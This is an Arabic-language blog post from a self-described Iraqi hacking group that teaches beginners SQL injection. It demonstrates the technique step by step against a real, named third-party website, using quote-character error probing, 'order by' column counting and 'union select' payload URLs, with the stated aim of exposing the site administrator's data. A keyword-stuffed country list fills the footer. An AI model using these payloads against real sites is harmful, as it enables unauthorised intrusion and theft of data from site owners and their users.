الحشد الشعبي

Recent Products RSS Feeds

فريق الهكر العراقي KAMINDOZ

TOOLS & EXPLOIT KAMINDOZ

DOWNLOAD VIDEO
 

اخر التغريدات
مقاطع الفيديو

:اكتشاف ثغرات sql واستغلالها #exploit #tech #الثغرات #الثغرات_الامنيه

KAMINDOZ

↑ Grab this Headline Animator

بسم الله الرحمن الرحيم
قال الامام علي علية السلام




اني ذقت الطيبات كلها فلم أجد أطيب من العافية. واني ذقت المرارات كلها فلم أجد أمر
من الحاجة الى الناس .واني حملت الصخر والحديد فلم أجد أثقل من الدَين .
واعلم إن الدهر يومان يوم لك ويوم عليك فان كان لك فلا
تبطر . وان كان عليك فلا تقهر فكلاهما سينحر .



اهلا شبابنا الاعزاء درسنا اليوم هو مدخل لحتراف ثغرات sql

تعريف بسيط
ثغرة sql injection :هي خطأ برمجي يقع به مبرمج السكربت وهي عدم فلترة المدخلات للدوال شوف مثال بسيط

index.php?id=1

شوف معي اخي الكريم
المتغير id او اي متغير مثلا a
index.php?a=1

لما نحاول نعمل اختبار راح نظع علامة (') فيصبح الاستغلال هكذا

index.php?id=1'

عندما تضع ' نهاية المتغير id=1 راح تنظر الى الموقع وتلاحظ بعض الامور التالية :

1.اذا حدث تغير بالصفحة فأعلم ان الموقع مصاب وهذا النوع يندر الان بعد الفلترة من قبل المبرمجين
2.لم يحدث تغير مرات التغير يحصل في السورس المصدري للصفحة وهذا فقط للمحترفين طبعا

ناخذ موقعين نختبر عليهم الخطوات اعلاه

هذا موقع راح نحاول نستغل ثغرة sql علية

http://www.ac-psych.org/index.php?id=1

طبعا المتغير index?id=1
راح انضيف علامة '
فيصبح الاستغلال هكذا index.php?id=1'

http://www.ac-psych.org/index.php?id=1'


سوف تظهر صفحة بيظاء بعد ما ضفنا علامة التنصيص ' وهذ يدل على وجود خطأ وهو تغير الصفحة والتغير هو عدم ضهور الكتابة فية


من هنا وضعنا قدمنا على اول الطريق راح نكمل

الان نحاول معرفة العمود المصاب لكي نستطيع اظهار معلومات المدير للموقع

شوف معي لاظهار الاعمدة المصابة

نستخدم هذه الدالة

+order+by+1
شوف اخي
http://www.ac-psych.org/index.php?id=1+order+by+1

وجرب اتغير 1 الى غير رقم لحتى تزول الاخطاء بالصفحة

شوف لما ضفت 1 رجعت الصفحة بدون خطأ

جربت رقم
http://www.ac-psych.org/index.php?id=1+order+by+2

ظهر خطأ من هنا يتبين لنا ان العمود 1 هو العمود المصاب

طيب الان ننتقل الى دالة الاستغلال

وهي union+select

تضاف الى الموقع هكذا
http://www.ac-psych.org/index.php?id=1+union+select+1

ظهر رقم 1 الصفحة

طيب هذا الموضوع هو مقدمة اتمنى ان يكون الشرح واضح جدا

مع خالص التحيات
منتديات الهكر العراقي , منظمة الاختراق العراقية kamindoz
Share
روابط هذه التدوينة قابلة للنسخ واللصق
URL
HTML
BBCode

kamindoz


 
::جميع المشاركات المكتوبة تعبّر عن وجهة نظر كاتبها ... ولا تعبّر عن وجهة نظر إدارة الموقع::

C0DED BY IRAQ Electronic Army 2015-2016

iraq , syria , iran ,Afghanistan,Albania , Algeria , Andorra , Angola , Antigua , and , Barbuda , Argentina , Armenia , Aruba , Australia , Austria , Azerbaijan

Bahamas, , The , Bahrain , Bangladesh , Barbados , Belarus , Belgium , Belize , Benin , Bhutan , Bolivia , Bosnia , and , Herzegovina , Botswana , Brazil ,Brunei , Bulgaria , Burkina , Faso , Burma , BurundiCambodia , Cameroon , Canada , Cape , Verde , Central , African , Republic , Chad , Chile , China , Colombia , Comoros , Congo, , Democratic , Republic , of , the , Congo, , Republic , of , the , Costa , Rica , Cote , d'Ivoire , Croatia , Cuba , Curacao ,,,Cyprus , Czech , Republic.Denmark , Djibouti , Dominica , Dominican Republic

Ecuador , Egypt , El , Salvador , Equatorial , Guinea , Eritrea , Estonia , Ethiopia , Fiji Finland France , Gabon , Gambia, , The , Georgia , Germany , Ghana , Greece , Grenada , Guatemala , Guinea , Guinea-Bissau , Guyana , Haiti , Holy , See , Honduras , Hong , Kong , Hungary ,

Iceland,India, Indonesia Ireland Italy